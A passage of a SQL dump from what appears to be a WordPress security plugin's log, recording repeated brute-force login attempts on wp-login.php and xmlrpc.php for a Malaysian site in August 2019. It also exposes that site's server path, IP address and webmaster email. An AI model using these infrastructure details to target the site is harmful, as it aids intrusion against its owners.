empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"86\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"162.244.95.2\";s:11:\"REMOTE_PORT\";s:5:\"38718\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWPwnjzAXRCh@i15RK1AdQAAAMc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1566830750.858\";s:12:\"REQUEST_TIME\";s:10:\"1566830750\";}}','notice','2019-08-26 14:45:52','2019-08-26 14:45:51',17685296,19176880,'https://bintara.com.my/wp-login.php',1,0,'162.244.95.2'),(23147,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"89\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"139.59.238.39\";s:11:\"REMOTE_PORT\";s:5:\"36524\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWPzAElLQKVpx7Mms7vMwwAAAcA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566831360.7994\";s:12:\"REQUEST_TIME\";s:10:\"1566831360\";}}','notice','2019-08-26 14:56:02','2019-08-26 14:56:01',17684184,19174480,'https://bintara.com.my/wp-login.php',1,0,'139.59.238.39'),(23148,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"190.153.194.237\";s:11:\"REMOTE_PORT\";s:5:\"58450\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWP1gYRetx8xvefGxXo1PQAAAEY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1566832001.973\";s:12:\"REQUEST_TIME\";s:10:\"1566832001\";}}','notice','2019-08-26 15:06:43','2019-08-26 15:06:42',17682240,19173808,'https://bintara.com.my/wp-login.php',1,0,'190.153.194.237'),(23149,0,'brute_force','invalid-login::username-administrator','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:13:\"administrator\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"481\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"190.153.194.237\";s:11:\"REMOTE_PORT\";s:5:\"58950\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWP1hYRetx8xvefGxXo1PgAAAEA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566832005.6828\";s:12:\"REQUEST_TIME\";s:10:\"1566832005\";}}','notice','2019-08-26 15:06:47','2019-08-26 15:06:46',18203688,19503816,'https://bintara.com.my/xmlrpc.php',1,0,'190.153.194.237'),(23150,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"193.112.223.243\";s:11:\"REMOTE_PORT\";s:5:\"35170\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWP4GoRetx8xvefGxXo29QAAAEI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566832666.7925\";s:12:\"REQUEST_TIME\";s:10:\"1566832666\";}}','notice','2019-08-26 15:17:48','2019-08-26 15:17:47',17684704,19173624,'https://bintara.com.my/wp-login.php',1,0,'193.112.223.243'),(23151,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"193.112.223.243\";s:11:\"REMOTE_PORT\";s:5:\"35554\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWP4HbLuw7edOKpgf7CJ2gAAAJY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566832669.7912\";s:12:\"REQUEST_TIME\";s:10:\"1566832669\";}}','notice','2019-08-26 15:17:51','2019-08-26 15:17:50',18199368,19495744,'https://bintara.com.my/xmlrpc.php',1,0,'193.112.223.243'),(23152,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"128.199.134.25\";s:11:\"REMOTE_PORT\";s:5:\"26528\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWP6TbLuw7edOKpgf7CKPQAAAIk\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566833229.8856\";s:12:\"REQUEST_TIME\";s:10:\"1566833229\";}}','notice','2019-08-26 15:27:11','2019-08-26 15:27:10',17685672,19174960,'https://bintara.com.my/wp-login.php',1,0,'128.199.134.25'),(23153,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"128.199.134.25\";s:11:\"REMOTE_PORT\";s:5:\"26816\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWP6T4Retx8xvefGxXo4KAAAAEM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566833231.8683\";s:12:\"REQUEST_TIME\";s:10:\"1566833231\";}}','notice','2019-08-26 15:27:13','2019-08-26 15:27:12',18199704,19493504,'https://bintara.com.my/xmlrpc.php',1,0,'128.199.134.25'),(23154,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"93.113.111.97\";s:11:\"REMOTE_PORT\";s:5:\"45148\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWP8poRetx8xvefGxXo5PQAAAEU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566833830.2038\";s:12:\"REQUEST_TIME\";s:10:\"1566833830\";}}','notice','2019-08-26 15:37:12','2019-08-26 15:37:10',17685256,19173464,'https://bintara.com.my/wp-login.php',1,0,'93.113.111.97'),(23155,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is 